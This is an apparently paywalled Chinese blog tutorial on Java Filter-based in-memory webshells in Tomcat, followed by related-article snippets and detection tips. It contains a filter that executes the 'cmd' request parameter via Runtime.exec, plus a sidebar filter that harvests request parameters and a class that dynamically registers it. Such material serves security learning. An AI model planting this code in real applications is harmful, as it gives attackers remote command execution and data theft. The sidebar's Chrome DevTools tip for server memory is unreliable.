java Filter内存马分析

最新推荐文章于 2025-04-02 15:45:12 发布
原创 最新推荐文章于 2025-04-02 15:45:12 发布 · 964 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #开发语言

本文探讨了Java Web中的Filter内存马,介绍了其概念、环境搭建、Filter内存马的探索,包括Tomcat Filter的执行流程和攻击思路分析。通过分析,展示了如何动态注册Filter马并编写exp,强调了其在攻防中的隐蔽性和危害性。

目录

0x01 什么是Filter马

0x02 环境搭建

0x03 Filter内存马探索

1.tomcat Filter 的流程分析

2.攻击思路分析

0x04 Filter内存马exp编写

本文由掌控安全学院 - xilitter 投稿

知识基础:

刚开始内存马的这块学习与反序列化并无太大关系,反而与javaweb,tomcat联系更加紧密。所以在学习内存马之前需要先了解JSP,java web的三大件,Servlet,Filter,Listener的基本知识和工作流程和Tomcat 架构的相关内容。

0x01 什么是Filter马

内存马就是无文件木马,无文件落地,它通常会存在进程,内存或者java虚拟机中,特点更加隐蔽,难以排查,并且也难以删除。而今天学习的Filter内存马是传统web应用型内存马,主要将恶意代码注入到过滤器中,当过滤器拦截servlet请求的参数时,过滤器中的恶意代码就会执行。

0x02 环境搭建

首先配置一个 servlet 的web项目,
 

图片


然后一直点下一步就好了,它会自动帮我们生成一个简单的servlet
pom.xml中导入tomcat相关依赖

<dependency>
            <groupId>org.apache.tomcat</groupId>
            <artifactId>tomcat-catalina</artifactId>
            <version>9.0.38</version>
            <scope>provided</scope>
        </dependency>
        <dependency>
            <groupId>org.apache.tomcat</groupId>
            <artifactId>tomcat-websocket</artifactId>
            <version>9.0.38</version>
        </dependency>

方便之后调试代码,在这之后我们创建一个自定义的Filter过滤器

package com.example.memoryhorse;
import javax.servlet.*;
import java.io.IOException;

public class MyFilter implements Filter{
    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        System.out.println("执行过滤功能");
        servletRequest.setCharacterEncoding("utf-8");
        servletResponse.setCharacterEncoding("utf-8");
        servletResponse.setContentType("text/html;charset=UTF-8");
        filterChain.doFilter(servletRequest,servletResponse);
        System.out.println(servletRequest.getParameter("cmd"));
        Runtime.getRuntime().exec(servletRequest.getParameter("cmd"));
    }
}

重写了doFilter方法,里面添加恶意代码,接收cmd参数,执行任意命令。web.xml中配置相关参数

<filter>
    <filter-name>MyFilter</filter-name>
    <filter-class>com.example.memoryhorse.MyFilter</filter-class>
</filter>
<filter-mapping>
    <filter-name>MyFilter</filter-name>
    <url-pattern>/MyFilter</url-pattern>
</filter-mapping>

这里我定义的是/MyFilter路由,在访问这个路由时,就会被我们自定义的过滤器拦截

0x03 Filter内存马探索

这个时候是不是就有点像内存马的样子,我们注册了一个恶意的 /MyFilter 路由,访问这个路由可以执行任意代码。测试一下
 

最低0.47元/天 解锁文章
zkzq
关注
内存基础知识 Java
CodeShiftZ的博客
09-07 535
Java中有三种类加载器:引导类加载器(Bootstrap Class Loader)、扩展类加载器(Extension Class Loader)和应用程序类加载器(Application Class Loader)。内存(Memory Shellcode)是一种恶意代码注入技术,它利用软件漏洞或者其他方式将恶意代码加载到受感染的进程内存中,并在执行过程中劫持程序的控制流。在Java中,我们可以自定义类加载器,通过继承ClassLoader类并实现自己的加载逻辑来加载类。内存基础知识 Java
一文深度学习java内存
jxiang213的博客
10-25 1416
java内存注入一般分为两种动态注册添加新的listener/filter/servlet/controller等等agent注入修改已有class,插入恶意代码在理解内存注入前,有几个概念需要掌握的。类加载双亲委派问题以及context类反射。
JAVA安全—手搓内存
2301_76227305的博客
03-01 1838
首先什么是内存呢,顾名思义就是把木打进内存中。传统的webshell一旦把文件删除就断开连接了,而Java内存则不同,它将恶意代码直接加载到内存中运行。因为代码是直接在内存中执行的,它不需要保存到硬盘上,这使得它很难被传统的杀毒软件发现和检测。至此结束。
学习Java agent 内存(看不懂别关闭,直接喷!!!)
一剑开天门!的博客
12-23 3768
java agent 是 Java 程序,可以通过在 Java 虚拟机(JVM)启动时提供参数来加载和运行。它可以通过 java.lang.instrument 包提供的 Java 标准接口进行代码插桩,从而在 Java 应用程序的类加载和运行期间改变 Java 字节码。而java agent内存就是利用这个特性产生。
浅析JavaWeb内存基础原理与查杀思路
道阻且长,行则将至
04-04 7627
传统的 Webshell 后门很容易被当前 WAF、HIDS、EDR 等安全设备检测出来,于是无文件落地的内存技术得以诞生并快速发展。本文简要分析Java内存的原理、分类,并实践了主流Webshell客户端管理工具内存的使用与当前应对内存的一些查杀思路、手段。
Java内存简单实现
派大星的博客
12-04 2838
Java内存
Java内存基础
m0_46317063的博客
02-05 493
filter内存基础
Java内存 原理、实战与查杀】
weixin_46318447的博客
06-11 3534
内存原理 、实战与查杀
java内存
google20的博客
12-25 1591
filter,servlet,listener,valve,spring内存
Java内存攻防实战——攻击基础篇
JavaMonsterr的博客
05-23 3706
在红蓝对抗中,攻击方广泛应用webshell等技术在防守方提供的服务中植入后门,防守方也发展出各种技术来应对攻击,传统的落地型webshell很容易被攻击方检测和绞杀。而内存技术则是通过在运行的服务中直接插入运行攻击者的webshell逻辑,利用中间件的进程执行某些恶意代码,而不依赖实体文件的存在实现的服务后门,因此具有更好的隐蔽性,也更容易躲避传统安全监测设备的检测。 本文以Java语言为基础讨论内存技术的攻防,分为两个篇章,分别是攻击基础篇和防护应用篇。本篇攻击基础篇介绍了Java Servlet
[Java安全]—Controller内存
Sentiment的博客
11-02 705
Controller内存
java内存原理和检测方法
m0_67170526的博客
04-02 1784
内存为现在的主流webshell技术之一, 一般存在于JAVA环境, ASPX环境也有内存,但是PHP没有(有不死,类似条件竞争)内存主要用途是做权限维持,特点是无文件,代码保存在内存中,导致值守人员不太好进行排查。
【Web】小白友好的Java内存基础学习笔记
uuzeray的博客
02-10 2068
内存(Memory Shellcode)是一种恶意攻击技术,旨在通过利用程序或操作系统的漏洞,将恶意代码注入到系统内存中并执行。与传统的攻击方式不同,内存不需要将恶意代码写入磁盘上的文件,而是直接在内存中进行操作,从而避开传统的安全防护措施。内存的危害性在于它可以绕过许多传统的安全防护机制,例如防病毒软件和防火墙,因为恶意代码不会留下明显的痕迹或文件。此外,由于直接在内存中执行,内存攻击也更难以被检测和追踪。
小谈java内存
shihui的博客
03-08 1111
省流版Servlet 内存:通过动态注册恶意 Servlet 并绑定 URL 路由,当访问特定路径时触发恶意逻辑。Filter 内存:通过动态注册恶意 Filter 并配置路由,拦截请求时触发恶意逻辑。Listener 内存:通过动态注册恶意 Listener,当特定事件发生时(如应用启动、会话创建)触发恶意逻辑。
红队视角下Java内存的应用
include_voidmain的博客
11-07 929
红队视角下Java内存的应用
Java内存使用
mudi13的博客
09-05 1607
对于终端安全:有文件监控、防篡改、EDR;对于后门:有 Webshell 查杀、流量监测;对于网络层面:有防火墙防止反连、反向代理系统隐藏真实 IP;等等。​ 目前主流的防御措施针对 Webshell 的静态检出率在 90% 以上,在部分环境下甚至完全无法落地,防御方可以做到快速应急响应。正因为这些限制,内存技术得以诞生并快速发展,无文件攻击、内存 Webshell、进程注入等基于内存的攻击手段也受到了越来越多的师傅青睐,在实战环境中已占得一席之地。
干货 | HW中盛行的Java内存,如何全面检测?
WangsuSecurity的博客
10-21 1623
本文系统性地列举了Java内存的检测方法,涵盖了从类的基本信息获取到字节码的深入检测
关于Java/Python/PHP 内存
2301_80115097的博客
11-15 1473
因为内存种类繁杂,每次都要翻看很多文章,又加上最近有某个大活动,因此就写了这篇文章来总结一下常见的3种语言(PHP、Python、JAVA)的内存的注入方法和查杀方法,并尝试自己完成一个内存查杀工具的实现。希望本篇文章能给师傅们带来一些启发。文章一长就难免在表达和准确性上有所疏漏,如有错误或不足,请师傅们指正。
Filter内存
最新发布
08-30
### Filter内存原理 Filter内存是一种基于Java Web应用的恶意代码注入技术,它利用Java Servlet Filter机制实现。在Java Web应用中,Filter用于在请求到达Servlet之前或响应返回客户端之前对请求和响应进行预处理和后处理。攻击者通过向应用程序的内存中动态注入自定义的Filter代码,使得该Filter在应用运行期间持续生效。 当客户端发送请求时,请求会先经过FilterChain,注入的恶意Filter会被触发执行,从而可以对请求和响应进行篡改、窃取敏感信息等恶意操作。由于Filter内存是在内存中运行,不落地到磁盘,传统的文件扫描工具难以检测到它。 ### Filter内存实现 以下是一个简单的Filter内存实现示例: ```java import javax.servlet.*; import java.io.IOException; // 恶意Filter示例 public class MaliciousFilter implements Filter { @Override public void init(FilterConfig filterConfig) throws ServletException {} @Override public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { // 可以在这里执行恶意操作,例如窃取请求参数 java.util.Enumeration<String> parameterNames = request.getParameterNames(); while (parameterNames.hasMoreElements()) { String paramName = parameterNames.nextElement(); String paramValue = request.getParameter(paramName); // 可以将参数信息发送到攻击者的服务器 System.out.println("Parameter: " + paramName + " = " + paramValue); } // 继续执行正常的FilterChain chain.doFilter(request, response); } @Override public void destroy() {} } ``` 要将这个Filter注入到Web应用中,攻击者通常会利用应用的漏洞,如反序列化漏洞、命令执行漏洞等,通过反射机制将Filter动态注册到Servlet容器中。例如,在Tomcat中可以通过以下方式注册: ```java import javax.servlet.FilterRegistration; import javax.servlet.ServletContext; import java.lang.reflect.Field; // 动态注册Filter public class FilterInjector { public static void injectFilter(ServletContext context) throws Exception { FilterRegistration.Dynamic registration = context.addFilter("MaliciousFilter", MaliciousFilter.class); registration.addMappingForUrlPatterns(null, false, "/*"); } } ``` ### Filter内存检测 - **日志分析**:分析Web应用的访问日志,查看是否存在异常的请求模式或参数。如果发现大量异常的请求参数被访问,可能存在Filter内存在窃取信息。 - **监控内存**:使用工具如Chrome DevTools的Performance面板(勾选"Memory"选项)监控应用的内存使用情况。如果发现内存占用异常增长或出现不明的内存对象,可能存在内存。 - **代码审计**:定期对Web应用的代码进行审计,检查是否存在动态注册Filter的代码。可以使用静态代码分析工具辅助审计。 ### Filter内存防范 - **修复漏洞**:及时修复Web应用中的漏洞,如反序列化漏洞、命令执行漏洞等,防止攻击者利用这些漏洞注入Filter内存。 - **权限管理**:严格控制应用的运行权限,避免应用以过高的权限运行,减少攻击者注入恶意代码的风险。 - **安全配置**:对Servlet容器进行安全配置,限制动态注册Filter的权限。例如,在Tomcat中可以通过配置`context.xml`文件来限制应用的权限。 - **实时监控**:使用运维监控系统实时收集应用的性能指标,如响应时间、吞吐量、错误率等。如果发现性能异常或出现故障,及时分析问题的根源并进行改进。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值